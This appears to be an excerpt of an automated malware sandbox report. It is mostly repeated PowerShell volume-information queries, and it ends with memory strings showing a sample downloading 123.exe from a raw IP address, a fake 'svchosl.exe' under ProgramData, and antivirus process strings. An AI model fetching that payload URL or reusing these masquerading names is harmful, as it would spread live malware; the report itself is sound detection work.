Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00412A15
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B345B00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 14_2_00007FF77B345B00
Source: C:\Users\123.exe Code function: 3_2_00EBB146 GetVersionExW, 3_2_00EBB146
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $]q6http://77.221.149.185/clients/123.exe|C:\users\123.exe
Source: 123.exe, 00000003.00000002.2357941483.0000000006A7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sers\123.exe
Source: 123.exe, 00000003.00000002.2355698018.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: XDhC:\users\123.exe
Source: Wmiic.exe, 00000006.00000002.2358490525.0000000000900000.00000004.00000020.00020000.00000000.sdmp, Wmiic.exe, 00000006.00000002.2358262764.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, Wmiic.exe, 00000006.00000002.2358565895.0000000000910000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000007.00000002.2365024291.00000000035E8000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000007.00000002.2365161763.0000000005040000.00000004.00000020.00020000.00000000.sdmp, Wmiic.exe, 00000009.00000002.2384089372.0000000000443000.00000004.00000020.00020000.00000000.sdmp, Wmiic.exe, 00000009.00000002.2384163111.0000000000490000.00000004.00000020.00020000.00000000.sdmp, Wmiic.exe, 00000009.00000002.2384235903.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, Wmiic.exe, 00000009.00000002.2384452858.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 0000000A.00000002.2384236321.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 0000000A.00000002.2384016099.0000000000568000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sfxname=C:\users\123.exe
Source: Wmiic.exe, 00000006.00000002.2358262764.00000000004DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \123.exe
Source: file.exe, 00000000.00000002.3280784216.00000000049E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.00000000049D4000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 123.exe, 00000003.00000002.2354767199.00000000004CE000.00000004.00000010.00020000.00000000.sdmp, 123.exe, 00000003.00000002.2355698018.0000000000687000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000003.00000002.2356597327.0000000000F12000.00000004.00000001.01000000.00000008.sdmp, 123.exe, 00000003.00000002.2355698018.0000000000680000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000003.00000002.2354767199.00000000004D8000.00000004.00000010.00020000.00000000.sdmp, 123.exe, 00000003.00000002.2354767199.00000000004E5000.00000004.00000010.00020000.00000000.sdmp, 123.exe, 00000003.00000002.2354767199.00000000004FA000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: C:\users\123.exe
Source: file.exe, 00000000.00000003.2297306478.0000000008A02000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297614225.0000000008A02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 123.exe, 00000003.00000002.2354767199.00000000004E5000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: C:\users\123.exe
Source: file.exe, 00000000.00000002.3280784216.00000000049E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.00000000049D4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: `,]qdC:\users\123.exe
